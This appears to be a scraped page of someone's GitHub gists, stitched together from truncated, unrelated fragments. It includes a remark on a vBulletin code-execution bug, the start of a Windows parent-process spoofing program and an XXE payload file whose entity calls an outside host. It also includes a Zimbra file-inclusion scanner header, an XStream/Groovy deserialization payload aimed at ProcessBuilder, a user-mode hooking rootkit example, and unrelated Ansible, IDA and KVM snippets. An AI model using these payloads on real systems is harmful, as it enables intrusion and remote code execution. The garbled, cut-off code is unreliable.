I have done some preliminary research into this bug and so far it does not seem like a backdoor. Just some really weird logic when handling routes, and rendering templates.
As to why widgetConfig[code] executes via a POST request, it is because of the following code located in /includes/vb5/frontend/applicationlight.php
$serverData = array_merge($_GET, $_POST);
if (!empty($this->application['handler']) AND method_exists($this, $this->application['handler']))
{
$app = $this->application['handler'];
/* x86_64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
/* spoof.exe explorer.exe calc.exe */
#include <windows.h>
#include <tlhelp32.h>
#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000
typedef struct _STARTUPINFOEX {
STARTUPINFO StartupInfo;
LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;
@JohnTroony
JohnTroony / XXE_payloads
Created September 3, 2018 09:24 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
description = [[
A 0-day was released on 6 December 2013 by rubina119 and was patched in Zimbra 7.2.6.
The vulnerability is a local file inclusion that can retrieve any file from the server.
// Compile with -std=c11
#include <stdlib.h>
#include <stdarg.h>
#include <stdio.h>
#include <inttypes.h>
#include <string.h>
#include <limits.h>
#define MAX_STR_LEN 4095
<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando" reference="../../../.."/>
            <owner class="java.lang.ProcessBuilder">
              <command>
@JohnTroony
JohnTroony / main.yaml
Created April 15, 2018 18:32 — forked from kbariotis/main.yaml
Ansible playbook for deploying a Node.js app to DigitalOcean
- name: DO
  hosts: localhost
  vars:
    project_name: "PUT A NAME FOR YOUR PROJECT HERE"
    do_token: "PUT YOUR DIGITAL OCEAN API KEY HERE ==> https://cloud.digitalocean.com/settings/api/tokens"
    repository: "PUT YOUR REPOSITORY URL HERE"
  tasks:
    - name: LOCAL | Generate SSH key
      shell: ssh-keygen -b 2048 -t rsa -f ~/.ssh/{{project_name}} -q -N ""
@JohnTroony
JohnTroony / listkmods.py
Created January 12, 2018 07:43 — forked from patois/listkmods.py
ida/vmware kernel debugging helper
from idaapi import *
# with code taken from http://hexblog.com/idapro/vmware_modules.py

class LoadedModulesList(Choose2):
    def __init__(self, title, flags=0, width=None, height=None, embedded=False, modal=False):
        self.ptr = get_name_ea_simple("PsLoadedModuleList")
        if self.ptr == BADADDR:
            raise ValueError('Missing symbol: PsLoadedModuleList')
@JohnTroony
JohnTroony / Injectable.cpp
Created December 18, 2017 19:10 — forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
#include <windows.h>
#include <stdio.h>
FARPROC fpCreateProcessW;
BYTE bSavedByte;
// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe
/*
* Kernel-based Virtual Machine driver for Linux
*
* This module enables machines with Intel VT-x extensions to run virtual
* machines without emulation or binary translation.
*
* Copyright (C) 2006 Qumranet, Inc.
* Copyright 2010 Red Hat, Inc. and/or its affiliates.
*
* Authors: